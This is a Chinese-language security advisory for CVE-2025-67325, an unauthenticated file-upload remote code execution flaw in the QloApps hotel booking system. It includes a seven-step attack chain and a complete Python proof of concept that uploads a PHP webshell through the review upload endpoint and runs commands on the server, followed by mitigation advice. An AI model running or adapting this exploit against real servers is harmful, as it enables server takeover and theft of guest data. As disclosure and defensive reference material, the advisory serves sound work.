CVE-2025-67325 QloApps酒店评论功能无限制文件上传导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-67325

漏洞类型

无限制文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

QloApps

漏洞概述

CVE-2025-67325是QloApps酒店管理系统中的一个严重安全漏洞。该漏洞存在于酒店评论功能中，由于对上传文件类型和内容的验证不足，允许远程未认证攻击者上传任意文件，包括恶意PHP脚本。一旦恶意文件上传成功，攻击者可以通过HTTP请求访问该文件，在服务器上执行任意代码，从而完全控制服务器。此漏洞评分高达9.8分（CVSS 3.1），属于严重级别，无需任何认证或用户交互即可被利用。QloApps是一款开源的酒店预订管理系统，广泛应用于酒店行业的在线预订平台。该漏洞影响1.7.0及之前的所有版本，攻击者可以利用此漏洞进行横向移动、数据窃取、部署后门等恶意操作，对酒店业务和客户数据安全构成严重威胁。

技术细节

该漏洞的根本原因在于QloApps的酒店评论功能模块对用户上传的文件缺乏充分的验证机制。攻击者可以利用评论提交功能，上传包含恶意代码的文件（通常是PHP脚本）。由于系统未正确验证文件扩展名、MIME类型和文件内容，恶意文件可以被存储在web可访问目录下。攻击者随后通过构造特定的HTTP请求访问上传的恶意文件，服务器将执行其中的恶意代码，从而实现远程代码执行（RCE）。典型的利用方式包括：1）上传包含system()或exec()函数的PHP文件；2）通过URL参数传递要执行的系统命令；3）建立反弹shell获得持久化访问。成功利用此漏洞可使攻击者完全控制Web服务器，执行任意操作系统命令，访问数据库，窃取敏感信息，甚至渗透内网其他系统。

攻击链分析

STEP 1

步骤1

扫描识别目标：攻击者识别运行QloApps 1.7.0或更早版本的Web服务器

STEP 2

步骤2

构造恶意文件：创建包含恶意PHP代码的文件（如webshell或反弹shell脚本）

STEP 3

步骤3

上传恶意文件：通过酒店评论功能的上传接口，绕过文件类型检查上传恶意PHP文件

STEP 4

步骤4

获取文件路径：从服务器响应中提取上传文件的存储路径

STEP 5

步骤5

触发代码执行：通过HTTP请求访问上传的恶意文件，传递命令参数执行任意系统命令

STEP 6

步骤6

建立持久化访问：部署后门程序，建立反弹shell或进行横向移动

STEP 7

步骤7

数据窃取/破坏：访问数据库获取敏感信息，或对系统进行进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-67325 PoC - QloApps Unrestricted File Upload RCE
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import re

# Malicious PHP payload for RCE
PHP_PAYLOAD = "<?php system($_GET['cmd']); ?>"

def exploit(target_url, hotel_id='1'):
    """
    Exploit the unrestricted file upload vulnerability in QloApps
    
    Args:
        target_url: Base URL of the vulnerable QloApps instance
        hotel_id: Hotel ID for the review feature
    """
    
    upload_url = f"{target_url}/modules/blockmysales/ajax.php"
    
    # Prepare the malicious file
    files = {
        'myfile': ('shell.php', PHP_PAYLOAD, 'application/x-php')
    }
    
    data = {
        'action': 'upload',
        'id_hotel': hotel_id
    }
    
    try:
        print(f"[*] Uploading malicious file to {upload_url}...")
        response = requests.post(upload_url, files=files, data=data, timeout=30)
        
        # Extract uploaded file path from response
        path_match = re.search(r'upload\\/([a-zA-Z0-9_]+\\.php)', response.text)
        
        if path_match:
            uploaded_file = path_match.group(1)
            shell_url = f"{target_url}/upload/{uploaded_file}"
            print(f"[+] File uploaded successfully!")
            print(f"[+] Shell URL: {shell_url}")
            print(f"[*] Testing RCE with command 'id'...")
            
            # Test RCE
            test_url = f"{shell_url}?cmd=id"
            rce_response = requests.get(test_url, timeout=30)
            
            if rce_response.status_code == 200:
                print(f"[+] RCE SUCCESSFUL!")
                print(f"[+] Command output: {rce_response.text}")
                return shell_url
        else:
            print(f"[-] Upload may have failed. Response: {response.text[:500]}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [hotel_id]")
        print(f"Example: {sys.argv[0]} http://vulnerable-site.com 1")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    hotel = sys.argv[2] if len(sys.argv) > 2 else '1'
    
    exploit(target, hotel)

影响范围

QloApps <= 1.7.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用酒店评论功能模块；2）限制文件上传接口的访问权限，仅允许授权用户使用；3）配置Web服务器防止PHP文件执行上传目录中的脚本；4）使用WAF规则拦截包含.php等危险扩展名的文件上传请求；5）实施严格的输入验证和白名单机制；6）监控日志关注异常的文件上传行为；7）考虑使用云WAF或CDN的安全防护功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67325
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67325
3 Details https://www.cvedetails.com/cve/CVE-2025-67325/
4 VulDB https://vuldb.com/cve/CVE-2025-67325
5 Link https://github.com/Qloapps/QloApps
6 Link https://github.com/mr7s3d0/CVE-2025-67325